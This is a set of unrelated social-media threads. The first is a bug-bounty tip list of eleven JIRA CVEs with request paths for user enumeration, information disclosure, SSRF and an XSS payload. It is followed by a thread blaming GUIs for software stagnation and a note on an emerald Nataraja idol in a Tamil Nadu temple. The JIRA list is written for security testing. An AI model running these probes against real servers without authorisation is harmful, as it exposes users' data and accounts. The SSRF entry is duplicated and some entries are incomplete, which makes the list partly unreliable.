#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.



1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.
10. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when valid vs. invalid user is queried.

11. CVE-2019-8442 (Sensitive Information Disclosure)

a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.
Tools: Nuclei Template can be used to automate most of these CVEs Detection.
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
- https://t.co/ZMVc80vrYQ

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The Great Software Stagnation is real, but we have to understand it to fight it. The CAUSE of the TGSS is not "teh interwebs". The cause is the "direct manipulation" paradigm : the "worst idea in computer science" \1

Progress in CS comes from discovering ever more abstract and expressive languages to tell the computer to do something. But replacing "tell the computer to do something in language" with "do it yourself using these gestures" halts that progress. \2

Stagnation started in the 1970s after the first GUIs were invented. Every genre of software that gives users a "friendly" GUI interface, effectively freezes progress at that level of abstraction / expressivity. Because we can never abandon old direct manipulation metaphors \3

The 1990s were simply the point when most people in the world finally got access to a personal computer with a GUI. So that's where we see most of the ideas frozen. \4

It's no surprise that the improvements @jonathoda cites, that are still taking place are improvements in textual representation : \5

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Margatha Natarajar murthi - Uthirakosamangai temple near Ramanathapuram,TN
Unique Natarajar made of emerlad is abt 6 feet tall.
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https://t.co/e1Ye8DrNWb day Maragatha Nataraja sannandhi will be closed after anointing the murthi with fresh sandal paste.Maragatha Natarajar is covered with sandal paste throughout the year

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